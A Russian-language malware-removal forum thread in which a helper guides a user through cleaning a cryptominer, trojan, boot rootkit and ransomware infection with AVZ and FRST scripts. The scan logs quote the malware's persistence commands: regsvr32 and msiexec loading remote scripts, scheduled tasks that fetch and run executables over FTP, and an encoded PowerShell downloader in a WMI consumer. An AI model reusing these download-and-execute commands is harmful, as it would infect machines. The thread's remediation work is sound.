Не запускаются браузеры, подозрение на майнер [Trojan.Win32.Siscos.zan]

[Allexan]

Здравствуйте!
Во вложении - лог.
При старте подвисает, браузеры не запускаются.
Спасибо.

[Info_bot]

Уважаемый(ая) Allexan, спасибо за обращение на наш форум!

Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

[SQ]

Здравствуйте,

HiJackThis (из каталога autologger)профиксить
Важно: необходимо отметить и профиксить только то, что указано ниже.

Код:

O4 - MSConfig\startupreg: start [command] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.1226bye.xyz:280/v.sct scrobj.dll (HKLM) (2019/06/20)
O4 - MSConfig\startupreg: start1 [command] = C:\Windows\system32\msiexec.exe /i http://js.1226bye.xyz:280/helloworld.msi /q (HKLM) (2019/06/20)
O4-32 - HKLM\..\Run: [start] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.0603bye.info:280/v.sct scrobj.dll
O7 - IPSec: Name: win (2019/06/20) - {0263e8a9-e3d0-4f80-a12d-dfe61fa0739c} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2019/06/20) - {0263e8a9-e3d0-4f80-a12d-dfe61fa0739c} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2019/06/20) - {0263e8a9-e3d0-4f80-a12d-dfe61fa0739c} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2019/06/20) - {0263e8a9-e3d0-4f80-a12d-dfe61fa0739c} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2019/06/20) - {0263e8a9-e3d0-4f80-a12d-dfe61fa0739c} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
O22 - Task: Mysa - C:\Windows\system32\cmd.exe /c echo open ftp.0603bye.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe
O22 - Task: Mysa1 - C:\Windows\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
O22 - Task: Mysa2 - C:\Windows\system32\cmd.exe /c echo open ftp.0603bye.info>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
O22 - Task: Mysa3 - C:\Windows\system32\cmd.exe /c echo open ftp.0603bye.info>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe
O22 - Task: ok - C:\Windows\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa

AVZ выполнить следующий скрипт.
Важно на ОС: Windows Vista/7/8/8.1 AVZ запускайте через контекстное меню проводника от имени Администратора.

Код:

begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.'+#13#10+'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); 
 StopService('clr_optimization_v4.0.30328_64');
 StopService('RpcEpt');
 DeleteService('RpcEpt');
 DeleteService('clr_optimization_v4.0.30328_64');
 QuarantineFile('C:\Windows\inf\lsmm.exe','');
 QuarantineFile('C:\Windows\debug\item.dat','');
 QuarantineFile('a.exe','');
 QuarantineFile('c:\windows\update.exe','');
 QuarantineFile('c:\windows\debug\item.dat','');
 QuarantineFile('c:\windows\help\lsmosee.exe','');
 QuarantineFile('c:\windows\debug\ok.dat','');
 QuarantineFile('C:\Windows\system32\dwm.exe','');
 QuarantineFile('C:\Windows\svchost.exe','');
 QuarantineFile('C:\ProgramData\clr_optimization_v4.0.30328_64\svchost.exe','');
 DeleteFile('C:\ProgramData\clr_optimization_v4.0.30328_64\svchost.exe','32');
 DeleteFile('C:\Windows\svchost.exe','32');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\start','command');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\start1','command');
 DeleteFile('C:\Windows\system32\Tasks\Mysa','64');
 DeleteFile('C:\Windows\system32\Tasks\Mysa1','64');
 DeleteFile('C:\Windows\system32\Tasks\Mysa2','64');
 DeleteFile('C:\Windows\system32\Tasks\Mysa3','64');
 DeleteFile('C:\Windows\system32\Tasks\ok','64');
 DeleteFile('c:\windows\debug\ok.dat','32');
 DeleteFile('c:\windows\help\lsmosee.exe','32');
 DeleteFile('c:\windows\debug\item.dat','32');
 DeleteFile('c:\windows\update.exe','32');
 DeleteFile('C:\Windows\debug\item.dat','32');
 DeleteFile('C:\Windows\inf\lsmm.exe','32');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
 ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.

После выполнения скрипта компьютер перезагрузится.

После перезагрузки:
- Выполните в AVZ:

Код:

begin
 CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); 
end.

Файл quarantine.zip из папки AVZ загрузите по ссылке "Прислать запрошенный карантин" вверху темы.

- Подготовьте лог AdwCleaner и приложите его в теме.

[Allexan]

Здравствуйте!

- Подготовьте лог AdwCleaner и приложите его в теме.

Лог во вложении.
Спасибо.

[SQ]

- Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

• Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
• Убедитесь, что в окне Optional Scan отмечены "List BCD" и "SigCheckExt".
  
• Нажмите кнопку Scan.
• После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.
• Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении.

[Allexan]

создан отчет [/list]

FRST.txt и Addition.txt
прикреплены.
Спасибо.

[SQ]

• Закройте и сохраните все открытые приложения.
• Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt с поддержкой Unicode в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
  
  Код:

  Start::
  CreateRestorePoint:
  CloseProcesses:
  (TODO: <公司名>) [File not signed] C:\Windows\Temp\conhost.exe
  (www.xmrig.com) [File not signed] C:\Windows\inf\lsmm.exe
  HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.0603bye.info:280/v.sct scrobj.dll <==== ATTENTION
  Task: {5365EC51-CC0C-415F-93A3-94923E107E48} - System32\Tasks\Mysa2 => cmd /c echo open ftp.0603bye.info>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
  Task: {7F358935-AE38-4032-873B-C3B06ED19E82} - \GoogleUpdateTaskMachineCore -> No File <==== ATTENTION
  Task: {7F8DE60A-E89F-4292-898A-CFE16C941552} - \GoogleUpdateTaskMachineUA -> No File <==== ATTENTION
  Task: {80344AF6-9EB5-4623-8060-29B8604FE2BA} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
  Task: {8041CCC5-FA98-4BD3-8059-D94D77DAAEE4} - System32\Tasks\Mysa => cmd /c echo open ftp.0603bye.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION
  Task: {827B8CD5-F552-4594-A1B4-D42AC6C66CD0} - System32\Tasks\Mysa3 => cmd /c echo open ftp.0603bye.info>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION
  Task: {934EAC10-6E6B-4052-B003-F3EAA453F72A} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
  Task: {95262626-24A8-4861-9EC3-5BCDE9F8E7A0} - \Adobe Acrobat Update Task -> No File <==== ATTENTION
  HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{9a2ccd15-7b03-4b75-872c-3c373288d183} <==== ATTENTION (Restriction - IP)
  CHR Extension: (Chrome Media Router) - C:\Users\Boris\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-06-20]
  CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
  Zip: C:\ProgramData\clr_optimization_v4.0.30328_64\svchost.exe;C:\Windows\svchost.exe;C:\Windows\SysWOW64\Drivers\64.exe;C:\Windows\cc64.exe;C:\Windows\ccc.exe;C:\Windows\system32\ok.exe;C:\Windows\service.exe;C:\Windows\qeriuwjhrf;C:\Windows\tasksche.exe;C:\Windows\system32\upsupx.exe;C:\Windows\system32\u.exe;C:\Windows\SysWOW64\CSVer.dll
  R2 clr_optimization_v4.0.30328_64; C:\ProgramData\clr_optimization_v4.0.30328_64\svchost.exe [1231360 2019-07-06] () [File not signed]
  S2 RpcEpt; C:\Windows\svchost.exe [106496 2019-07-06] () [File not signed] <==== ATTENTION
  File: C:\Windows\SysWOW64\Drivers\64.exe
  2019-07-06 11:57 - 2019-07-06 12:49 - 003514368 ____S C:\Windows\tasksche.exe
  2019-07-06 11:57 - 2019-07-06 11:58 - 002061938 ____S C:\Windows\qeriuwjhrf
  2019-07-06 01:28 - 2019-07-06 01:29 - 001231360 _____ C:\Windows\service.exe
  2019-07-06 01:27 - 2019-07-06 01:27 - 000106496 _____ C:\Windows\cc64.exe
  2019-07-06 01:22 - 2019-07-06 01:24 - 002363733 _____ C:\Windows\ccc.exe
  2019-07-06 01:20 - 2019-07-06 01:20 - 000106496 _____ C:\Windows\svchost.exe
  2019-07-03 22:30 - 2019-07-16 00:10 - 002241024 _____ C:\Windows\system32\ok.exe
  2019-07-03 22:30 - 2019-07-16 00:10 - 000221184 _____ (TODO: <公司名>) C:\Windows\system32\upsupx.exe
  2019-07-03 22:30 - 2019-07-04 22:41 - 000037888 _____ (Orgs) C:\Windows\system32\u.exe
  2019-06-25 08:11 - 2019-07-21 22:40 - 000003520 _____ C:\Windows\System32\Tasks\Mysa
  2019-06-25 08:11 - 2019-07-21 22:40 - 000003506 _____ C:\Windows\System32\Tasks\Mysa3
  2019-06-25 08:11 - 2019-07-21 22:40 - 000003426 _____ C:\Windows\System32\Tasks\Mysa2
  2019-06-25 08:11 - 2019-07-21 22:40 - 000003190 _____ C:\Windows\System32\Tasks\Mysa1
  2019-06-25 08:11 - 2019-07-21 22:40 - 000003186 _____ C:\Windows\System32\Tasks\ok
  2019-07-21 22:39 - 2019-03-29 21:26 - 000000081 _____ C:\Windows\system32\s
  2019-07-21 22:39 - 2019-03-29 21:26 - 000000079 _____ C:\Windows\system32\ps
  2019-07-21 22:39 - 2019-03-29 21:26 - 000000077 _____ C:\Windows\system32\p
  2019-07-06 01:27 - 2019-07-06 01:27 - 000106496 _____ C:\Windows\cc64.exe
  2019-07-06 01:22 - 2019-07-06 01:24 - 002363733 _____ C:\Windows\ccc.exe
  2019-07-06 01:28 - 2019-07-06 01:29 - 001231360 _____ C:\Windows\service.exe
  2019-07-06 01:20 - 2019-07-06 01:20 - 000106496 _____ C:\Windows\svchost.exe
  2019-07-06 11:57 - 2019-07-06 12:49 - 003514368 ____S C:\Windows\tasksche.exe
  2019-07-03 22:30 - 2019-07-16 00:10 - 002241024 _____ C:\Windows\system32\ok.exe
  2019-07-03 22:30 - 2019-07-04 22:41 - 000037888 _____ (Orgs) C:\Windows\system32\u.exe
  2019-07-03 22:30 - 2019-07-16 00:10 - 000221184 _____ (TODO: <公司名>) C:\Windows\system32\upsupx.exe
  WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckyoumm4\"",Filter="__EventFilter.Name=\"fuckyoumm3\":: <==== ATTENTION
  WMI:subscription\__FilterToConsumerBinding->\\.\root\subscription:ActiveScriptEventConsumer.Name=\"fuckyoumm2_consumer\"",Filter="\\.\root\subscription:__EventFilter.Name=\"fuckyoumm2_filter\":: <==== ATTENTION
  WMI:subscription\__TimerInstruction->fuckyoumm2_itimer:: <==== ATTENTION
  WMI:subscription\__IntervalTimerInstruction->fuckyoumm2_itimer:: <==== ATTENTION
  WMI:subscription\__EventFilter->fuckyoumm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] <==== ATTENTION
  WMI:subscription\CommandLineEventConsumer->fuckyoumm4::[CommandLineTemplate => cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB (the data entry has 666 more characters).] <==== ATTENTION
  Reboot:
  End::

• Запустите FRST и нажмите один раз на кнопку Fix и подождите.
• Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
• Обратите внимание, что компьютер будет перезагружен.

На рабочем столе образуется карантин вида <date>.zip загрузите по ссылке "Прислать запрошенный карантин" вверху темы.

[Allexan]

создаст лог-файл (Fixlog.txt).

Во вложении

На рабочем столе образуется карантин вида <date>.zip

Появилось два файла:
23.07.2019_22.10.53.zip
и
23.07.2019_22.10.54.zip
Во вложении

После работы FRST и перезагрузки в процессах присутствует процесс conhost.exe с названием "TODO: <公司名> "

В автозагрузке ( msconfig ) уже после перезагрузки присутствовала запись
regsrv32 /u /s /i:h ttp://js.0603bye.info:280/v.sct.scrobj.dll

Спасибо.

[SQ]

Скорее всго вирус находится в загрузочном секторе поэтому после перегрузке он восстанавливается.

- Покажите лог TDSSKiller
Файл C:\TDSSKiller.***_log.txt приложите в теме.
(где *** - версия программы, дата и время запуска.)

P.S. Важно самостоятельно ничего не удаляйте.

[Allexan]

Файл C:\TDSSKiller.***_log.txt приложите в теме.

В памяти обнаружен Rootkit.Win64.DarkGalaxy.a
На диске обнаружен Device\Harddisk0\DR0 Rootkit.Boot.DarkGalaxy.a
Произведено лечение TDSSKiller'ом.
После перезагрузки в процессах чисто, несмотря на наличие
в автозагрузке ( msconfig ) :
regsrv32 /u /s /i:h ttp://js.0603bye.info:280/v.sct.scrobj.dll
Спасибо.

[SQ]

да, необходимо было вылечить rootkit.Boot.DarkGalaxy.a

Приложите новые логи FRST, зачистим все остальное.

[Allexan]

Приложите новые логи FRST

Во вложении.
Спасибо.

[SQ]

• Закройте и сохраните все открытые приложения.
• Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt с поддержкой Unicode в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
  
  Код:

  Start::
  CreateRestorePoint:
  CloseProcesses:
  HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{b2d68c0a-d606-4ea6-a12f-9dcd407d25fe} <==== ATTENTION (Restriction - IP)
  File: C:\Program Files (x86)\AnyDesk\AnyDesk.exe
  File: C:\Program Files\Unlocker\UnlockerDriver5.sys
  2019-07-25 23:20 - 2019-07-25 23:20 - 002241024 _____ C:\Windows\system32\ok.exe
  2019-07-25 23:20 - 2019-07-25 23:20 - 000221184 _____ (TODO: <公司名>) C:\Windows\system32\upsupx.exe
  2019-07-25 23:20 - 2019-07-25 23:20 - 000037888 _____ (Orgs) C:\Windows\system32\u.exe
  2019-07-24 07:41 - 2019-07-25 20:18 - 000000081 _____ C:\Windows\system32\s
  2019-07-24 07:41 - 2019-07-25 20:18 - 000000079 _____ C:\Windows\system32\ps
  2019-07-24 07:41 - 2019-07-25 20:18 - 000000077 _____ C:\Windows\system32\p
  2019-07-23 22:35 - 2019-07-25 23:20 - 000003520 _____ C:\Windows\System32\Tasks\Mysa
  2019-07-23 22:35 - 2019-07-25 23:20 - 000003506 _____ C:\Windows\System32\Tasks\Mysa3
  2019-07-23 22:35 - 2019-07-25 23:20 - 000003426 _____ C:\Windows\System32\Tasks\Mysa2
  2019-07-23 22:35 - 2019-07-25 23:20 - 000003190 _____ C:\Windows\System32\Tasks\Mysa1
  2019-07-23 22:35 - 2019-07-25 23:20 - 000003186 _____ C:\Windows\System32\Tasks\ok
  File: C:\Windows\SysWOW64\Drivers\64.exe
  File: C:\Windows\system32\IEUDINIT.EXE
  Folder: C:\Windows\IME
  2019-07-25 23:20 - 2019-03-30 00:28 - 000000084 _____ C:\Program Files\Common Files\xpdown.dat
  2019-07-25 23:20 - 2019-07-25 23:20 - 002241024 _____ C:\Windows\system32\ok.exe
  2019-07-25 23:20 - 2019-07-25 23:20 - 000037888 _____ (Orgs) C:\Windows\system32\u.exe
  2019-07-25 23:20 - 2019-07-25 23:20 - 000221184 _____ (TODO: <公司名>) C:\Windows\system32\upsupx.exe
  File: C:\Windows\SysWOW64\CSVer.dll
  Reboot:
  End::

• Запустите FRST и нажмите один раз на кнопку Fix и подождите.
• Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
• Обратите внимание, что компьютер будет перезагружен.

[CyberHelper]

=D1=F2=E0=F2=E8=F1=F2=E8=EA=E0 =EF=F0=EE=E2=E5=E4=E5=ED=ED=EE=E3=EE =EB=
=E5=F7=E5=ED=E8=FF:

• =CF=EE=EB=F3=F7=E5=ED=EE =EA=E0=F0=E0=ED=F2=E8=ED=EE=E2: 5
• =CE=E1=F0=E0=E1=EE=F2=E0=ED=EE =F4=E0=E9=EB=EE=E2: 16
• =C2 =F5=EE=E4=E5 =EB=E5=F7=E5=ED=E8=FF =EE=E1=ED=E0=F0=F3=E6=E5=ED=FB=
  =E2=F0=E5=E4=EE=ED=EE=F1=ED=FB=E5 =EF=F0=EE=E3=F0=E0=EC=EC=FB:
  
  1. \ccc.exe - HEUR:Trojan.Win32.Generic ( AVAST4: Win32:Malwa=
     re-gen )
  2. \cc64.exe - Trojan.Win32.Siscos.zan ( BitDefender: Gen:Var=
     iant.Symmi.50843, AVAST4: Win32:Trojan-gen )
  3. c:\windows\debug\item.dat - UDS:DangerousObject.Multi.Generi=
     c ( AVAST4: Win32:Trojan-gen )
  4. c:\windows\inf\lsmm.exe - not-a-virus:HEUR:RiskTool.Win32.Bi=
     tCoinMiner.gen ( AVAST4: Win32:CryptoMiner-L [Trj] )
  5. \ok.exe - UDS:DangerousObject.Multi.Generic ( AVAST4: Win3=
     2:Trojan-gen )
  6. \qeriuwjhrf - UDS:DangerousObject.Multi.Generic ( AVAST4: =
     Win32:Malware-gen )
  7. \svchost.exe - UDS:DangerousObject.Multi.Generic ( AVAST4:=
     Win32:Miner-AY [Trj] )
  8. \svchost.exe - Trojan.Win32.Siscos.zan ( BitDefender: Gen:=
     Variant.Symmi.50843, AVAST4: Win32:Trojan-gen )
  9. \tasksche.exe - Trojan-Ransom.Win32.Wanna.zbu ( BitDefende=
     r: Gen:Trojan.Heur.RP.wtW@aGEmS3di )
  10. \u.exe - VHO:Trojan-Downloader.Win32.Agentb.gen ( AVAST4: =
      Win32:Trojan-gen )
  11. \upsupx.exe - Trojan.Win64.Miner.kau ( AVAST4: Win32:Malwa=
      re-gen )